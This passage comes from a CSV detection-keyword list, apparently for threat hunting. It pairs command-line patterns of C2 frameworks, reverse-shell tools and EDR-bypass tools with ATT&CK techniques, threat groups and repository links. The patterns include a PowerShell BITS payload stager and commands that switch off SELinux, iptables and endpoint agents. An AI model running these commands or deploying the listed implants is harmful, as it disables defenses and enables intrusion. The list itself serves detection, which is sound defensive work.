light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"nimplant *","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"nmap *","greyware_tool_keyword","nmap","A very common tool. Network host vuln and port detector.","T1046 - T1065 - T1202 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Information Gathering","https://github.com/nmap/nmap","1","0","greyware tool - risks of False positive !","N/A","10","8301","2206","2023-09-29T08:27:35Z","2012-03-09T14:47:43Z" +"noclient-3.*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"onex install *","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/onex","1","0","N/A","N/A",,"N/A",,, +"polenum *:*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"posh -u *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"powerpick *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"powershell.exe -nop -c ""start-job *Import-Module BitsTransfer*$env:temp*GetRandomFileName()*Start-BitsTransfer -Source 'http*Remove-Item*Receive-Job*","offensive_tool_keyword","powershell","deployment of a payload through a PowerShell stager using bits to download","T1197","TA0009","N/A","N/A","Collection","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"ps_ex *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"psenum *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"psgrep *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"psinject","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"pupysh","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"python3 start_campaign.py","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"raw_keylogger *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","0","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" +"rawshark -*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"rcat listen *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"RedGuard -*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"remotereg *","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"rev2self*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"rpcclient -*","greyware_tool_keyword","rpcclient","tool for executing client side MS-RPC functions","T1021.006 - T1049","TA0002 - TA0009","N/A","N/A","Lateral movement","https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html","1","0","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A" +"runof *.o*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"runpe *.exe*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"samdump *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"ScareCrow -*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"schkconfig off cbdaemon","greyware_tool_keyword","shell","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"scrun.exe *","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","0","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" +"service cbdaemon stop","greyware_tool_keyword","shell","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"service ip6tables stop","greyware_tool_keyword","iptables","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"service iptables stop","greyware_tool_keyword","iptables","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"set CMD *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"set ENDPOINT *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"set shellcode *","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"set srvhost *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"set_child *.exe","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"Set-ADObject -SamAccountName * -PropertyName scriptpath -PropertyValue *\*.exe*","greyware_tool_keyword","powershell","AD module Logon Script from remote IP","T1037.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"setenforce 0","greyware_tool_keyword","shell","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"sh_executor *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"sharescan *.txt","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"shell.exe -u http://*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" +"ShellCmd *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"show shellcodes","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"SigFlip *","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"SigFlip *.exe*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"sleeper force","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - 